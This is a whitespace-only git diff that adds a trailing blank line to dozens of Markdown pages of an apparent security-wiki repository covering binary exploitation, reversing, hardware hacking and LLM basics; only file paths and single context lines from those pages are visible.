a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md index b144fa96a..183b59933 100644 
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/aslr/ret2plt.md @@ -82,3 +82,4 @@ p.interactive() {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md index 20c9dfefd..850bafe24 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/no-exec-nx.md @@ -16,3 +16,4 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md index 6d0524f08..e2ae64f4e 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/README.md @@ -32,3 +32,4 @@ bypassing-canary-and-pie.md {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md index d3e1dfea0..5e3d0e761 100644 
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md @@ -90,3 +90,4 @@ elf.address = RIP - (RIP & 0xfff) {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md index f7986e355..0b2966919 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/relro.md @@ -33,3 +33,4 @@ Note that LIBC's GOT is usually Partial RELRO, so it can be modified with an arb {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md index 54d5a83dd..ab91f509c 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/README.md @@ -70,3 +70,4 @@ If the binary has Partial RELRO, then you can use an arbitrary write to modify t {{#include ../../../../banners/hacktricks-training.md}} + 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md index 9cbef43fa..e7d6e5ed8 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md @@ -236,3 +236,4 @@ io.interactive() - 64 bits, no PIE, nx, modify thread and master canary. + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md index bc6d59959..790338f89 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-binary-protections-and-bypasses/stack-canaries/print-stack-canary.md @@ -28,3 +28,4 @@ With an arbitrary read like the one provided by format **strings** it might be p {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md index a2f51f81a..9606d20ef 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/common-exploiting-problems.md 
@@ -38,3 +38,4 @@ In order to bypass this the **escape character `\x16` must be prepended to any ` {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md index 35fdff3c3..101c12795 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/elf-tricks.md @@ -396,3 +396,4 @@ The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thr {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md index 4a7a297bf..024999845 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/README.md @@ -170,3 +170,4 @@ p.interactive() {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md index 5260f58fb..ddd9f2b58 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md @@ -142,3 +142,4 @@ P.interactive() {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md index ed33d2c84..22fdf02e7 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md 
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/one-gadget.md @@ -22,3 +22,4 @@ To the address indicated by One Gadget you need to **add the base address where {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md index 1c69a5277..b32c98ca6 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/README.md @@ -95,3 +95,4 @@ There are several protections trying to prevent the exploitation of vulnerabilit {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md index 070328c13..395956bd9 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/pointer-redirecting.md @@ -29,3 +29,4 @@ You can find an example in: {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md index 2e68173a8..b7cffb228 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2csu.md @@ -82,3 +82,4 @@ Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protec {{#include ../../../banners/hacktricks-training.md}} + 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md index 803a9e427..25ca65ab0 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2dlresolve.md @@ -65,3 +65,4 @@ p.interactive() {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md index c76e07751..920fe6d48 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2esp-ret2reg.md @@ -66,3 +66,4 @@ You can find an example here: [https://ir0nstone.gitbook.io/notes/types/stack/re {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md index 61f7f38fd..f25d3f66c 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/README.md @@ -143,3 +143,4 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format {{#include ../../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md index a6ed561de..31bdd49c6 100644 
--- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/README.md @@ -305,3 +305,4 @@ BINSH = next(libc.search("/bin/sh")) - 64 {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md index 9e880995a..caf6a76ea 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md @@ -219,3 +219,4 @@ BINSH = next(libc.search("/bin/sh")) - 64 {{#include ../../../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md index dbc6084a9..aa8560981 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2ret.md @@ -33,3 +33,4 @@ Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overf {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md index c2539d09c..dd2e8067f 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md 
+++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/ret2win.md @@ -99,3 +99,4 @@ The Python script sends a carefully crafted message that, when processed by the {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md index bf1ab4fd9..495b9aaf9 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-return-oriented-programing.md @@ -180,3 +180,4 @@ stack-pivoting-ebp2ret-ebp-chaining.md {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md index a19003e59..0283dadac 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/rop-syscall-execv.md @@ -199,3 +199,4 @@ target.interactive() {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md index aef7facea..9de40c526 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/srop-sigreturn-oriented-programming.md @@ -62,3 +62,4 @@ p.interactive() {{#include ../../../banners/hacktricks-training.md}} + 
diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index a81314ee5..3c39e27b3 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -190,3 +190,4 @@ xchg , rsp {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md index 37bd380df..533b36cc0 100644 --- a/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md +++ b/src/reversing-and-exploiting/linux-exploiting-basic-esp/stack-overflow/stack-shellcode.md @@ -95,3 +95,4 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing/common-api-used-in-malware.md b/src/reversing/common-api-used-in-malware.md index 987b6028c..04c816d24 100644 --- a/src/reversing/common-api-used-in-malware.md +++ b/src/reversing/common-api-used-in-malware.md @@ -139,3 +139,4 @@ The malware will unmap the legitimate code from memory of the process and load a {{#include ../banners/hacktricks-training.md}} + diff --git a/src/reversing/cryptographic-algorithms/README.md b/src/reversing/cryptographic-algorithms/README.md index 018650d03..84569181f 100644 --- a/src/reversing/cryptographic-algorithms/README.md +++ b/src/reversing/cryptographic-algorithms/README.md @@ -185,3 +185,4 @@ Check **3 comparisons to recognise it**: {{#include ../../banners/hacktricks-training.md}} + 
diff --git a/src/reversing/cryptographic-algorithms/unpacking-binaries.md b/src/reversing/cryptographic-algorithms/unpacking-binaries.md index fa9e007e4..9132f1946 100644 --- a/src/reversing/cryptographic-algorithms/unpacking-binaries.md +++ b/src/reversing/cryptographic-algorithms/unpacking-binaries.md @@ -24,3 +24,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools-basic-methods/README.md b/src/reversing/reversing-tools-basic-methods/README.md index 2ca719738..fb7c07bb3 100644 --- a/src/reversing/reversing-tools-basic-methods/README.md +++ b/src/reversing/reversing-tools-basic-methods/README.md @@ -412,3 +412,4 @@ So, in this challenge, knowing the values of the buttons, you needed to **press {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools-basic-methods/angr/README.md b/src/reversing/reversing-tools-basic-methods/angr/README.md index 5cff6ad5a..2bb827489 100644 --- a/src/reversing/reversing-tools-basic-methods/angr/README.md +++ b/src/reversing/reversing-tools-basic-methods/angr/README.md @@ -211,3 +211,4 @@ Furthermore, you can use `proj.hook_symbol(name, hook)`, providing the name of a {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md index 6dde52c67..b8e79f15d 100644 --- a/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md +++ b/src/reversing/reversing-tools-basic-methods/angr/angr-examples.md @@ -836,3 +836,4 @@ if __name__ == '__main__': {{#include ../../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools-basic-methods/blobrunner.md b/src/reversing/reversing-tools-basic-methods/blobrunner.md index 528d3a514..a6cd68d9f 100644 --- a/src/reversing/reversing-tools-basic-methods/blobrunner.md +++ b/src/reversing/reversing-tools-basic-methods/blobrunner.md 
@@ -210,3 +210,4 @@ int main(int argc, char* argv[]) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools-basic-methods/cheat-engine.md b/src/reversing/reversing-tools-basic-methods/cheat-engine.md index 1d8eb48f5..2e0b2442e 100644 --- a/src/reversing/reversing-tools-basic-methods/cheat-engine.md +++ b/src/reversing/reversing-tools-basic-methods/cheat-engine.md @@ -163,3 +163,4 @@ So, insert your new assembly code in the "**newmem**" section and remove the ori {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md index 052f3ae17..9a1901a41 100644 --- a/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md +++ b/src/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md @@ -188,3 +188,4 @@ else: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools/README.md b/src/reversing/reversing-tools/README.md index 49c5e8462..ca9f57426 100644 --- a/src/reversing/reversing-tools/README.md +++ b/src/reversing/reversing-tools/README.md @@ -114,3 +114,4 @@ To decompile Java bytecode, these tools can be very helpful: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing/reversing-tools/blobrunner.md b/src/reversing/reversing-tools/blobrunner.md index 528d3a514..a6cd68d9f 100644 --- a/src/reversing/reversing-tools/blobrunner.md +++ b/src/reversing/reversing-tools/blobrunner.md @@ -210,3 +210,4 @@ int main(int argc, char* argv[]) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/reversing/word-macros.md b/src/reversing/word-macros.md index f3d025225..f5234fae6 100644 --- a/src/reversing/word-macros.md +++ b/src/reversing/word-macros.md 
@@ -18,3 +18,4 @@ Using the **GetObject** function it's possible to obtain data from forms of the {{#include ../banners/hacktricks-training.md}} + diff --git a/src/stego/esoteric-languages.md b/src/stego/esoteric-languages.md index 7661d896c..9890075ce 100644 --- a/src/stego/esoteric-languages.md +++ b/src/stego/esoteric-languages.md @@ -69,3 +69,4 @@ Kukarek {{#include ../banners/hacktricks-training.md}} + diff --git a/src/stego/stego-tricks.md b/src/stego/stego-tricks.md index d62dec11c..0f465574c 100644 --- a/src/stego/stego-tricks.md +++ b/src/stego/stego-tricks.md @@ -220,3 +220,4 @@ For translating Braille, the [Branah Braille Translator](https://www.branah.com/ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/6881-udp-pentesting-bittorrent.md b/src/todo/6881-udp-pentesting-bittorrent.md index 25c97cae9..1fffcb957 100644 --- a/src/todo/6881-udp-pentesting-bittorrent.md +++ b/src/todo/6881-udp-pentesting-bittorrent.md @@ -3,3 +3,4 @@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/android-forensics.md b/src/todo/android-forensics.md index 079176ee7..ed1b539ce 100644 --- a/src/todo/android-forensics.md +++ b/src/todo/android-forensics.md @@ -27,3 +27,4 @@ Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/burp-suite.md b/src/todo/burp-suite.md index 14466ea26..927d53fa0 100644 --- a/src/todo/burp-suite.md +++ b/src/todo/burp-suite.md @@ -17,3 +17,4 @@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/cookies-policy.md b/src/todo/cookies-policy.md index 08300b186..427802224 100644 --- a/src/todo/cookies-policy.md +++ b/src/todo/cookies-policy.md @@ -46,3 +46,4 @@ If you have any questions or concerns about this Cookies Policy, please contact + diff --git a/src/todo/hardware-hacking/README.md b/src/todo/hardware-hacking/README.md index 7ce959e33..e464ff0b7 100644 
--- a/src/todo/hardware-hacking/README.md +++ b/src/todo/hardware-hacking/README.md @@ -52,3 +52,4 @@ The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/hardware-hacking/fault_injection_attacks.md b/src/todo/hardware-hacking/fault_injection_attacks.md index 6b96e7df6..8c9946b40 100644 --- a/src/todo/hardware-hacking/fault_injection_attacks.md +++ b/src/todo/hardware-hacking/fault_injection_attacks.md @@ -6,3 +6,4 @@ There are a lot of methods and mediums for injecting fault into an electronic ci + diff --git a/src/todo/hardware-hacking/i2c.md b/src/todo/hardware-hacking/i2c.md index 5544a7e5a..5d49e5041 100644 --- a/src/todo/hardware-hacking/i2c.md +++ b/src/todo/hardware-hacking/i2c.md @@ -212,3 +212,4 @@ Any key to exit {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/hardware-hacking/jtag.md b/src/todo/hardware-hacking/jtag.md index ccbfd02f5..1e28c9127 100644 --- a/src/todo/hardware-hacking/jtag.md +++ b/src/todo/hardware-hacking/jtag.md @@ -26,3 +26,4 @@ If you are contacting a JTAG, you will find one or several **lines starting by F {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/hardware-hacking/radio.md b/src/todo/hardware-hacking/radio.md index 79ce5586d..2e7666bc7 100644 --- a/src/todo/hardware-hacking/radio.md +++ b/src/todo/hardware-hacking/radio.md @@ -198,3 +198,4 @@ You can use the **same technique as the one used in the AM example** to get the {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/hardware-hacking/side_channel_analysis.md b/src/todo/hardware-hacking/side_channel_analysis.md index af4df1da0..f0a169bc2 100644 --- a/src/todo/hardware-hacking/side_channel_analysis.md +++ b/src/todo/hardware-hacking/side_channel_analysis.md @@ -8,3 +8,4 @@ These attacks are very popular in case of leaking data such as private keys or f + 
diff --git a/src/todo/hardware-hacking/spi.md b/src/todo/hardware-hacking/spi.md index f60d72f06..55b394f92 100644 --- a/src/todo/hardware-hacking/spi.md +++ b/src/todo/hardware-hacking/spi.md @@ -67,3 +67,4 @@ flashrom -VV -c "W25Q64.V" -p buspirate_spi:dev=COM3 -r flash_content.img {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/hardware-hacking/uart.md b/src/todo/hardware-hacking/uart.md index f99b8a08d..b2e270fa2 100644 --- a/src/todo/hardware-hacking/uart.md +++ b/src/todo/hardware-hacking/uart.md @@ -185,3 +185,4 @@ Although, it is necessary to note that it's not always the case that the uboot i {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/todo/industrial-control-systems-hacking/README.md b/src/todo/industrial-control-systems-hacking/README.md index 37829c900..59b927e35 100644 --- a/src/todo/industrial-control-systems-hacking/README.md +++ b/src/todo/industrial-control-systems-hacking/README.md @@ -17,3 +17,4 @@ These techniques can also be used to protect against attacks and blue teaming fo + diff --git a/src/todo/industrial-control-systems-hacking/modbus.md b/src/todo/industrial-control-systems-hacking/modbus.md index 5b423d8b3..1ddffe887 100644 --- a/src/todo/industrial-control-systems-hacking/modbus.md +++ b/src/todo/industrial-control-systems-hacking/modbus.md @@ -34,3 +34,4 @@ Due to it's large scale use and lack of upgradations, attacking Modbus provides + diff --git a/src/todo/interesting-http.md b/src/todo/interesting-http.md index 5efcf75c2..14a3a2afa 100644 --- a/src/todo/interesting-http.md +++ b/src/todo/interesting-http.md @@ -39,3 +39,4 @@ Never put any sensitive data inside GET parameters or paths in the URL. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/todo/investment-terms.md b/src/todo/investment-terms.md index c0c66c4c0..663a09170 100644 --- a/src/todo/investment-terms.md +++ b/src/todo/investment-terms.md 
@@ -69,3 +69,4 @@ However, the buyer will be paying some fee to the seller for opening the option + diff --git a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md index e56929d3c..68bd15747 100644 --- a/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md +++ b/src/todo/llm-training-data-preparation/0.-basic-llm-concepts.md @@ -299,3 +299,4 @@ During the backward pass: - **Ease of Use:** Eliminates manual computation of derivatives. + diff --git a/src/todo/llm-training-data-preparation/1.-tokenizing.md b/src/todo/llm-training-data-preparation/1.-tokenizing.md index 0b126a672..6a8c8eaf9 100644 --- a/src/todo/llm-training-data-preparation/1.-tokenizing.md +++ b/src/todo/llm-training-data-preparation/1.-tokenizing.md @@ -97,3 +97,4 @@ print(token_ids[:50]) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + diff --git a/src/todo/llm-training-data-preparation/2.-data-sampling.md b/src/todo/llm-training-data-preparation/2.-data-sampling.md index 695f072ee..b46e59081 100644 --- a/src/todo/llm-training-data-preparation/2.-data-sampling.md +++ b/src/todo/llm-training-data-preparation/2.-data-sampling.md @@ -239,3 +239,4 @@ tensor([[ 367, 2885, 1464, 1807], - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + diff --git a/src/todo/llm-training-data-preparation/3.-token-embeddings.md b/src/todo/llm-training-data-preparation/3.-token-embeddings.md index a0f9514be..a5a5d3a99 100644 --- a/src/todo/llm-training-data-preparation/3.-token-embeddings.md +++ b/src/todo/llm-training-data-preparation/3.-token-embeddings.md 
@@ -217,3 +217,4 @@ print(input_embeddings.shape) # torch.Size([8, 4, 256]) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + diff --git a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md index 88c96386d..0e58c52d7 100644 --- a/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md +++ b/src/todo/llm-training-data-preparation/4.-attention-mechanisms.md @@ -428,3 +428,4 @@ For another compact and efficient implementation you could use the [`torch.nn.Mu - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + diff --git a/src/todo/llm-training-data-preparation/5.-llm-architecture.md b/src/todo/llm-training-data-preparation/5.-llm-architecture.md index 1e86eaff4..267e68a6c 100644 --- a/src/todo/llm-training-data-preparation/5.-llm-architecture.md +++ b/src/todo/llm-training-data-preparation/5.-llm-architecture.md @@ -700,3 +700,4 @@ print("Output length:", len(out[0])) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + diff --git a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md b/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md index b493e9798..ac8b12b36 100644 --- a/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md +++ b/src/todo/llm-training-data-preparation/6.-pre-training-and-loading-models.md @@ -969,3 +969,4 @@ There 2 quick scripts to load the GPT2 weights locally. For both you can clone t - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) + 
